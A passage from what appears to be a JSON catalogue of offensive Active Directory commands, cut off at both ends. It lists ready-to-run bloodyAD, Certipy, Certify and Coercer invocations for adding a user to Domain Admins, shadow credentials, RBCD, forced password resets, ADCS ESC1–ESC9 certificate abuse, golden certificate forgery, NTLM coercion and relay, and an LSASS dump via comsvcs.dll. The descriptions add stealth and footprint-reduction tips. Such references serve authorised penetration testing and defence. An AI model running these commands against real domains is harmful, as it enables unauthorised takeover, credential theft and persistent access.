you hold GenericAll you can reset passwords, set shadow credentials, or configure RBCD on the target.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tGranted principal: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:bloodyAD-AddGroupMember","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddGroupMember","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Add yourself (john) to a group you can write to\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add groupMember 'Domain Admins' john","description":"bloodyAD's `add groupMember` action writes the `member` attribute of a group over LDAP, adding an arbitrary principal (typically yourself) to it. Use it when BloodHound shows you hold GenericAll, GenericWrite, WriteOwner, or Self/AddMember over a privileged group such as an admin or Remote Management group. Adding your account to a high-value group is a direct privilege-escalation primitive; remove yourself afterward to reduce footprint.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget group: Domain Admins","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/addmember","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:bloodyAD-AddRBCD","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddRBCD","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# Allow EVILPC$ to act on behalf of others against DC01$\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add rbcd 'DC01$' 'EVILPC$'","description":"bloodyAD's `add rbcd` action writes the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of a target computer over LDAP, configuring Resource-Based Constrained Delegation so that a controlled service account may impersonate any user to that machine. Combine with an attacker-controlled computer account (see bloodyAD add computer) and Impacket getST -impersonate to obtain a service ticket as a local admin. Requires GenericWrite / GenericAll / WriteProperty over the target computer object.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget computer: DC01$\n\n\tControlled service: EVILPC$","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:bloodyAD-DontReqPreauth","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-DontReqPreauth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"# Enable targeted AS-REP roasting on the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add uac victim -f DONT_REQ_PREAUTH","description":"bloodyAD's `add uac` action with the `-f DONT_REQ_PREAUTH` flag sets the DONT_REQ_PREAUTH bit in a target user's userAccountControl over LDAP, disabling Kerberos pre-authentication. This is a targeted AS-REP roasting primitive: once the flag is set you can request an AS-REP for the account and crack it offline. Requires GenericWrite / write access to the target's userAccountControl; remove the flag afterward to clean up.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: victim","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:bloodyAD-SetOwner","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-SetOwner","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Persistence"],"nativeCategory":["PrivEsc","Exploitation","Persistence"],"command":"# Take ownership of the victim object, then grant yourself full control\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set owner victim john\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john","description":"bloodyAD's `set owner` action rewrites the owner field in a target object's security descriptor over LDAP. The object owner has implicit WriteDacl, so seizing ownership of a user, group, or computer lets you subsequently grant yourself GenericAll (see bloodyAD add genericAll) and fully control it. Use it when BloodHound reports WriteOwner over a principal. Pair it with a follow-up DACL write to complete the takeover.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tNew owner: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:bloodyAD-SetPassword","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-SetPassword","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Force-reset the password of a user you have write rights over\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set password victim 'NewPassword123!'","description":"bloodyAD's `set password` action performs a targeted password reset on a user or computer object over LDAP(S). It is the exploitation step when you hold GenericAll, User-Force-Change-Password, or WriteAll over a victim principal discovered in BloodHound. Resetting a service account or privileged user password grants immediate takeover, at the cost of locking out the legitimate user, so it is loud. Requires LDAPS (or LDAP with channel binding) on modern DCs for the password write.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: victim","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:bloodyAD-ShadowCredentials","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-ShadowCredentials","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Add a shadow credential (KeyCredentialLink) to the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add shadowCredentials 'DC01$'","description":"bloodyAD's `add shadowCredentials` action appends an attacker-generated key credential to the target's `msDS-KeyCredentialLink` attribute (the Shadow Credentials / Key Trust technique). Requiring only GenericWrite over the victim and an ADCS-enabled PKINIT-capable environment, it lets you authenticate as the target via a certificate and recover its NT hash without changing the account's password, making it far stealthier than a password reset. bloodyAD prints the PFX and follow-up PKINIT command.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: DC01$","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certify-ESC1","toolId":"wadcoms:Certify","toolName":"Certify","name":"Certify-ESC1","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"Certify.exe request /ca:dc.test.local\\test-CA /template:ESC1 /altname:administrator","description":"Certify is the Windows/.NET GhostPack tool for enumerating and abusing AD CS from an existing foothold. Its request verb enrolls in a vulnerable template and, for ESC1, uses /altname to set an arbitrary Subject Alternative Name (e.g. Administrator) on the issued certificate. The output PEM is converted to .pfx with openssl and then passed to Rubeus asktgt /certificate for PKINIT. Use this when you already have a Windows beacon and want to stay on-host rather than pivoting to a Linux attacker box with Certipy.\n\nCommand Reference:\n\n\tCA config: dc.test.local\\test-CA\n\n\tTemplate: ESC1\n\n\tImpersonated user: Administrator","mitre":[],"requires":["Shell"],"services":["ADCS"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-Account-Create","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Account-Create","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"certipy account create -u john@test.local -p password123 -dc-ip 10.10.10.1 -user 'WEBSRV01$' -pass 'ComputerPass123!' -dns websrv01.test.local","description":"Certipy account create adds a new computer (or user) object over LDAP when the operator has MachineAccountQuota available or delegated create rights. This is useful for staging RBCD, Shadow Credentials, or ESC-chain victim accounts that the operator fully controls. The subcommand also supports read/update/delete to modify existing objects' attributes (UPN, SPN, DNS hostname). Runs over LDAP, so add -k / -dc-host for Kerberos-only environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew account: WEBSRV01$\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://www.thehacker.recipes/ad/movement/adcs"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-Auth-PKINIT","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Auth-PKINIT","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"certipy auth -pfx administrator.pfx -username administrator -domain test.local -dc-ip 10.10.10.1","description":"Certipy auth consumes a certificate/private key pair (.pfx) and performs Kerberos PKINIT pre-authentication to request a TGT for the identity in the certificate. It then uses the U2U/UnPAC-the-hash technique to recover the account's NT hash from the PAC, saving a .ccache and printing the hash. This is the final step of most ADCS escalation chains (ESC1/ESC3/ESC6/shadow creds): turn the issued certificate into a usable TGT and an NT hash for pass-the-hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tPFX file: administrator.pfx\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Certificate"],"services":["Kerberos","ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/kerberos/pkinit"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-ESC1","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC1","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'ESC1' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500","description":"ESC1 abuses a certificate template that allows an enrollee to supply an arbitrary Subject Alternative Name (ENROLLEE_SUPPLIES_SUBJECT) and enables Client Authentication EKU, while granting enrollment rights to low-privileged users. Certipy req enrolls against the vulnerable template and sets -upn to Administrator, producing a .pfx that authenticates as the domain admin. Supply -sid with the target's objectSid so the request also survives the 2022 strong certificate mapping (KB5014754) enforcement. Follow up with certipy auth to obtain a TGT and NT hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-ESC3","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC3","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# 1) Obtain an enrollment agent certificate\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'EnrollmentAgent'\n\n# 2) Request a cert on behalf of the Administrator using the agent pfx\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -pfx john.pfx -on-behalf-of 'TEST\\Administrator'","description":"ESC3 abuses a template that grants the Certificate Request Agent (Enrollment Agent) EKU. Certipy first enrolls in the enrollment-agent template to obtain an agent .pfx, then makes a second request against a normal client-auth template (e.g. User) with -on-behalf-of set to a privileged account and -pfx pointing at the agent certificate. The resulting certificate authenticates as the impersonated user. Requires enrollment rights on both the agent template and the target template.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-ESC4","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC4","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Back up the template config, then overwrite it with a default vulnerable (ESC1-like) configuration\ncertipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -save-old\n\n# Now abuse it exactly like ESC1 (see Certipy-ESC1), then restore the original config afterwards:\n# certipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -configuration ESC4.json","description":"ESC4 is a certificate template ACL misconfiguration: the operator has Write/WriteDacl/WriteOwner over a template object. Certipy template with -write-default-configuration overwrites the template's settings with a known ESC1-vulnerable configuration (enrollee-supplied SAN, client-auth EKU, low-priv enrollment), turning any template into an ESC1 path. Use -save-old first to snapshot the original config, exploit ESC1, then restore with -write-configuration <file>.json to reduce footprint. OPSEC: the template change is domain-wide and logged in the config partition.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["ADCS","LDAP"],"references":["https://github.com/ly4k/Certipy","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-ESC6","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC6","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500","description":"ESC6 occurs when the Enterprise CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set, which lets any requester embed an arbitrary SAN into a certificate regardless of the template's subject settings. Certipy req can therefore enroll in a standard client-auth template (e.g. User) while supplying -upn Administrator to impersonate a privileged account. Include -sid to satisfy strong certificate mapping. Note that post-May-2022 patched DCs ignore the SAN unless the mapping is present, so ESC6 alone is often mitigated on updated environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-ESC7-ManageCA","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC7-ManageCA","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Grant our user the officer right on the CA\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -add-officer john\n\n# Enable the SubCA template so we can request against it\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -enable-template 'SubCA'\n\n# Request (goes pending), then issue and retrieve as an officer\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'SubCA' -upn administrator@test.local\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -issue-request 785\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -retrieve 785","description":"ESC7 is when a principal holds the ManageCA (or ManageCertificates) right on the Enterprise CA. Certipy ca -add-officer promotes the controlled user to a certificate officer, which lets it approve pending requests. Combined with enabling the built-in SubCA template (-enable-template SubCA), the operator can request a cert that goes pending, then issue it (-issue-request) and retrieve it (-retrieve) as any UPN. This turns CA administrative rights into domain-admin certificate issuance.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local","mitre":[],"requires":["Username","Password"],"services":["ADCS","RPC"],"references":["https://github.com/ly4k/Certipy","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-ESC8-Relay","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC8-Relay","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Credential Access","Execution"],"nativeCategory":["PrivEsc","Credential Access","Exploitation"],"command":"# Start the ADCS HTTP relay targeting the CA web enrollment endpoint\ncertipy relay -target 'http://10.10.10.1' -template 'DomainController'\n\n# In another shell, coerce the DC to authenticate to the listener (10.10.10.2), e.g.\n# coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2","description":"ESC8 abuses the AD CS web enrollment interface (certsrv / certfnsh.asp), which accepts NTLM authentication and is not protected by channel binding or EPA by default. Certipy relay stands up an HTTP-to-ADCS relay server; once a privileged machine account (e.g. a domain controller) is coerced into authenticating (PetitPotam/Coercer), the relay requests a certificate from the DomainController template on its behalf. The resulting .pfx authenticates as the coerced machine. Certipy relay is the modern replacement for ntlmrelayx.py -t http://<ca>/certsrv/certfnsh.asp --adcs.\n\nCommand Reference:\n\n\tCA / web enrollment host IP: 10.10.10.1\n\n\tAttacker/Listener IP: 10.10.10.2","mitre":[],"requires":["No credentials"],"services":["ADCS","NTLM"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-ESC9-NoSecurityExtension","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC9-NoSecurityExtension","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Point the controlled victim's UPN at the target admin (no @domain, so it maps by name)\ncertipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn administrator\n\n# Enroll/authenticate as victim (now mapping to administrator), then restore:\n# certipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn victim@test.local","description":"ESC9/ESC10 abuse weak certificate mapping. When a template has CT_FLAG_NO_SECURITY_EXTENSION (ESC9) or the DC uses weak UPN/SPN mapping (ESC10), an attacker with write access over a victim account can change its userPrincipalName to a target admin's value, enroll a certificate as the victim, then authenticate as the admin because the cert has no SID binding. Certipy account update rewrites the victim's -upn over LDAP; revert it afterwards. This chains with certipy shadow (to enroll as the victim) and certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: victim\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-Find-Vulnerable","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Find-Vulnerable","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"certipy find -u john@test.local -p password123 -dc-ip 10.10.10.1 -vulnerable -stdout","description":"Certipy's find command enumerates the AD Certificate Services environment over LDAP and RPC, collecting Enterprise CAs, published certificate templates, and their security descriptors. The -vulnerable flag filters the output to only templates and CA settings that match a known ESC misconfiguration (ESC1-ESC16), and -stdout prints a readable report to the console instead of writing BloodHound/JSON/text files. Run this first with any domain foothold to map which escalation path is available before requesting a certificate.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["ADCS","LDAP"],"references":["https://github.com/ly4k/Certipy","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation","https://www.thehacker.recipes/ad/movement/adcs/certificate-templates"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-Forge-GoldenCert","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Forge-GoldenCert","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"certipy forge -ca-pfx test-CA.pfx -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500 -out administrator_forged.pfx","description":"A 'golden certificate' is forged offline once the operator has extracted the Enterprise CA's own certificate and private key (via certipy ca -backup or ESC7, output as a .pfx). Certipy forge signs a brand-new certificate for any UPN with that CA key, so it is trusted by every DC in the forest. Because it never touches the CA and needs no enrollment, it is a durable persistence primitive that survives the target user's password resets. Include -sid to satisfy strong certificate mapping. Feed the forged .pfx to certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tCA private key (PFX): test-CA.pfx\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["Certificate"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Certipy-ShadowCredentials","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ShadowCredentials","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Privilege Escalation"],"nativeCategory":["Credential Access","PrivEsc"],"command":"certipy shadow auto -u john@test.local -p password123 -dc-ip 10.10.10.1 -account victim","description":"Shadow Credentials abuse write access to a target's msDS-KeyCredentialLink attribute (Key Trust). Certipy shadow auto adds an attacker-controlled key credential to the target account over LDAP, uses it to obtain a certificate via PKINIT, recovers the account's NT hash, and then removes the key credential to clean up automatically. Requires GenericWrite/GenericAll (or equivalent) over the target and a KDC that supports PKINIT. Preferred over PyWhisker when you want the full add-authenticate-restore chain in one step.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget account: victim\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos","ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Coercer-Coerce","toolId":"wadcoms:Coercer","toolName":"Coercer","name":"Coercer-Coerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2","description":"Coercer is a multi-protocol authentication coercion tool that automatically walks through every known RPC coercion method (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, MS-EVEN and more) against a target and triggers the machine account to authenticate back to an attacker-controlled listener. The 'coerce' mode fires all applicable methods, making it the fastest way to obtain a machine-account NTLM authentication to feed into ntlmrelayx or krbrelayx. Requires a valid domain account by default and works well when you do not yet know which specific coercion vector (PrinterBug, PetitPotam, DFSCoerce, ShadowCoerce) is exposed. OPSEC: it is noisy, hitting many named pipes in one run.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/p0dalirius/Coercer","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Coercer-Scan","toolId":"wadcoms:Coercer","toolName":"Coercer","name":"Coercer-Scan","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Coercer scan -u john -p password123 -d test.local -t 10.10.10.1","description":"Coercer's 'scan' mode enumerates which RPC coercion methods and named pipes are reachable on a target without actually completing an authentication relay, letting an operator map the exposed attack surface (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, etc.) before choosing a vector. Use it as reconnaissance to confirm a host is vulnerable and to pick the quietest single method rather than blasting all of them with coerce. Typically run with a valid domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/p0dalirius/Coercer","https://podalirius.net/en/articles/coercer-an-automatic-authentication-coercion-tool/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Comsvcs-MiniDump-LSASS","toolId":"wadcoms:Comsvcs","toolName":"Comsvcs","name":"Comsvcs-MiniDump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Get the LSASS PID first: tasklist /fi \"imagename eq lsass.exe\"\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <lsass_pid> C:\\Windows\\Temp\\lsass.dmp full","description":"The built-in comsvcs.dll exports a MiniDump function that rundll32 can call to write a full memory dump of any process by PID, making it a living-off-the-land LSASS dumper that needs no dropped tooling. Supply the LSASS PID (find it with tasklist or Get-Process lsass), an output path, and the 'full' flag for a complete dump. It requires SYSTEM (or admin + SeDebugPrivilege); the dump is then parsed offline with pypykatz or Mimikatz. This technique is 